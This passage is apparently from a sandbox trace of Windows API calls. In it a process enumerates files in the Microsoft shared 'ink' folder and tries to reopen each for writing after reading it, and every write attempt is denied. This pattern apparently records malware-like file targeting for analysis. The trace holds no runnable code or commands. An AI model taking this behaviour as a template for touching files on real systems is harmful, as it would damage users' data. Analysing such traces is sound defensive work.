hHeap=0x20000) returned 1 [0100.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0100.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0100.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0100.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0100.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0100.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0100.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0100.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0100.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0100.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0100.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0100.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0100.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0100.447] AreFileApisANSI () returned 1 [0100.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll", lpUsedDefaultChar=0x0) returned 69 [0100.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0100.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.447] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.447] AreFileApisANSI () returned 1 [0100.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a6f8 [0100.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8a6f8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 69 [0100.447] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.448] GetFileType (hFile=0x368) returned 0x1 [0100.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0100.448] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.448] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.448] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.448] CloseHandle (hObject=0x368) returned 1 [0100.448] AreFileApisANSI () returned 1 [0100.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0100.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 69 [0100.448] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.449] GetLastError () returned 0x5 [0100.449] GetLastError () returned 0x5 [0100.449] SetLastError (dwErrCode=0x5) [0100.449] GetLastError () returned 0x5 [0100.449] SetLastError (dwErrCode=0x5) [0100.449] GetLastError () returned 0x5 [0100.449] SetLastError (dwErrCode=0x5) [0100.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0100.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0100.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.449] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a4376e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd51e08b5, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd51e08b5, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x178200, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="mip.exe", cAlternateFileName="")) returned 1 [0100.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0100.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0100.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0100.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0100.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0100.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0100.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.449] AreFileApisANSI () returned 1 [0100.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe", lpUsedDefaultChar=0x0) returned 59 [0100.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0100.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.450] AreFileApisANSI () returned 1 [0100.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0100.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0100.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 59 [0100.450] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.450] GetFileType (hFile=0x368) returned 0x1 [0100.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.450] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.450] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.451] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.451] CloseHandle (hObject=0x368) returned 1 [0100.451] AreFileApisANSI () returned 1 [0100.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0100.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0100.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=59 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 59 [0100.451] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.451] GetLastError () returned 0x5 [0100.451] GetLastError () returned 0x5 [0100.451] SetLastError (dwErrCode=0x5) [0100.451] GetLastError () returned 0x5 [0100.451] SetLastError (dwErrCode=0x5) [0100.451] GetLastError () returned 0x5 [0100.451] SetLastError (dwErrCode=0x5) [0100.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0100.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0100.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.452] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a1d507, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xde1acd8d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xde1acd8d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x612e00, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="mraut.dll", cAlternateFileName="")) returned 1 [0100.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0100.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0100.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0100.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0100.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0100.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0100.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.452] AreFileApisANSI () returned 1 [0100.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll", lpUsedDefaultChar=0x0) returned 61 [0100.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0100.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.453] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.453] AreFileApisANSI () returned 1 [0100.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0100.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e608 [0100.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6e608, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 61 [0100.547] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.548] GetFileType (hFile=0x368) returned 0x1 [0100.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0100.548] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.548] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.548] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.549] CloseHandle (hObject=0x368) returned 1 [0100.549] AreFileApisANSI () returned 1 [0100.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0100.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6de98 [0100.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6de98, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll") returned 61 [0100.549] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.549] GetLastError () returned 0x5 [0100.549] GetLastError () returned 0x5 [0100.549] SetLastError (dwErrCode=0x5) [0100.549] GetLastError () returned 0x5 [0100.549] SetLastError (dwErrCode=0x5) [0100.549] GetLastError () returned 0x5 [0100.549] SetLastError (dwErrCode=0x5) [0100.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0100.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0100.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.549] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3a52f7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3c3a52f7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3c3a52f7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc800, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="mshwgst.dll", cAlternateFileName="")) returned 1 [0100.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0100.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0100.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0100.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0100.550] HeapFree (in: 